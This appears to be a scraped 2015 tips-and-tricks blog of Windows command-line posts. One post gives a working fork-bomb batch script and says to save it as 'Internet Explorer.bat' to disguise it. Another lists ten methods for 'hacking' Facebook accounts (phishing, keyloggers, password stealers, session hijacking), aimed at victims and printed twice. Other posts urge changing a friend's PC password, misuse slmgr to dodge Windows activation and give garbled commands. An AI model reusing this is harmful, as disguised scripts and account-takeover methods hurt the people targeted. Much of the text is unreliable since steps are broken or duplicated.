Tuesday, January 27, 2015

How to change any window password

how to change window password

How to change any window password

STEP 1:

 
How to change any window password
 

STEP 2:

How to change any window password

STEP 3:

How to change any window password

STEP 4:

How to change any window password

STEP 5:

How to change any window password

STEP 6:

How to change any window password


      You change your friend PC password

                                                                                                                              plz like and share this

Sunday, January 25, 2015

This is Possible to hide any drive in your PC using command prompt

This is Possible to hide any drive in your PC using command prompt. follow the below simple steps. Try this trick yourself and see the magic :D

Steps : 

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt

or type "cmd" in search.


Step 2. In the Command Prompt, type Diskpart and Press enter key. If UAC (User Account Control), dialog-box prompts than click Yes.


Step 3. Then type List Volume and press enter, this will show the list of all your PC drives.
This is Possible to hide any drive in your PC using command prompt


Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 6 (i.e. Volume Number) or by typing Select Volume G(i.e. Drive letter) it is possible in both way
This is Possible to hide any drive in your PC using command prompt

Step 5. To hide your drive, type Remove Letter G. Here, G is the drive letter. You can use any drive letter you want.
This is Possible to hide any drive in your PC using command prompt

How To Unhide Hidden Drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.

Step 2. To show the hidden drive type Assign Letter G and Press enter, now you can view G: drive in explorer. open below Image and see.

Saturday, January 24, 2015

How to Make virus damage your computer

Step 1: NotePad

First you need to open Notepad.
You can go to the start menu and Click "All Programs", Then find the Folder "Accessories"
and "Notepad" should be in that folder.
Or you can open the start menu and type "Notepad" and click enter and Notepad will open.

Go To Next Step---------------------------------------->>>>>
How to Make viruses

Step 2: The Typing Part

How to Make viruses
Type in Notepad-
@echo off
:a
Start
Start
Start
Start
Start
Start
goto :a


What this will do is Open CMD six times and then repeat itself. Over and Over. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!!

Step 3: Saving

How to Make viruses

When you save, Go to "File", "Save As", and save it as "Internet Explorer.bat". Where it says "FileType" Select "All Files" or it wont work!!!
Make Sure you save it to the desktop!!!!!!!!!

Friday, January 23, 2015

create boot in usb with the help of command

create boot in usb with the help of command

HOW TO MAKE BOOTABLE (USB)

Today I tell you how to make boot in usb with the help of cmd.

          SOME (CMD) USED IN

1: Click on start button open start menu type in search (CMD).
2:Double click on (CMD) when open cmd you type command key.
3:disk part  (press enter)
       New (CMD) window appear on screen 
4:listdisk (press enter)
5:select disk 1 (press enter)
6:clean (press enter)
7:creat partition primary (press enter)
8:format fs=ntfs quick (press enter)
9:active (press enter)
10:exit (press enter)

      This way to make boot in any (USB).

Wednesday, January 21, 2015

how to remove viruses in your hard disk

how to remove viruses in your hard disk

Today my topic on (VIRUSES)

how to remove viruses in your hard disk.mostly hard disk corrupt from viruses.you remove viruses in your hard disk.Used this command.

(CMD) REMOVE "VIRUSES"

1: Click on start button open start menu type in search (CMD).
2:Double click on (CMD) when open cmd you type command key.
3: attrib -h -r -s /s /d k:*.*_
4: -h -r -s /s /d k:*.*_ your hard disk name for example: -e -d -f /f /d k:*.*_

                    NOW ENJOY THIS TRICK

online software Free provider soft&more tricks: Hack facebook account with the help of 10 differen...

online software Free provider soft&more tricks: Hack facebook account with the help of 10 differen...: 1. Phishing Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out...

Tuesday, January 20, 2015

Hack facebook account with the help of 10 different tricks

Hack facebook account with the help of 10 different tricks

1. Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

2. Key logging

Key logging is the easiest way to hack a Facebook password. Key logging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Key logger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealer's

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Side jacking With Fire sheep

Side jacking attack went common in late 2010, however it's still popular now a days. Fire sheep is widely used to carry out side jacking attacks. Fire sheep only works when the attacker and victim is on the same WiFi network. A side jacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Bot nets

Bot nets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Bot net is basically a collection of compromised computer. The infection process is same as the key logging, however a Bot net gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Bot nets include Spy 

1. Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

2. Key logging

Key logging is the easiest way to hack a Facebook password. Key logging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Key logger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealer's

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Side jacking With Fire sheep

Side jacking attack went common in late 2010, however it's still popular now a days. Fire sheep is widely used to carry out side jacking attacks. Fire sheep only works when the attacker and victim is on the same WiFi network. A side jacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Bot nets

Bot nets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Bot net is basically a collection of compromised computer. The infection process is same as the key logging, however a Bot net gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Bot nets include eye and Zeus.

Monday, January 19, 2015

usb unable to format write protected

usb unable to format write protected

 Tips & tricks

HOW TO FORMAT USB
1. Turn off your computer or laptop
2. Insert USB memory Stick into your laptop or Computer
3. Re-start your PC and then start pressing (F8) key then to open Advanced Boot Options screen
4. Select Safe Mode with Command Prompt
5. After loading files if your USB Memory Stick drive letter is (G) for example then write as
6. C:\windows\system32>G: and press enter
7. G:\>format  G: and press enter
8. If ask you (Y/N) then press (Y) and press enter
9. This should do the trick.

how to any window active with the help of cmd

 Tips & tricks

1:Step> open start button 
2:Step> click on search and type (cmd) click on (cmd)
3:Step>when open (cmd) you type "slmgr _rearm" and press enter.
4:Step> 2nd type (cmd) "exit" 

          NOW ENJOY ACTIVE WINDOW.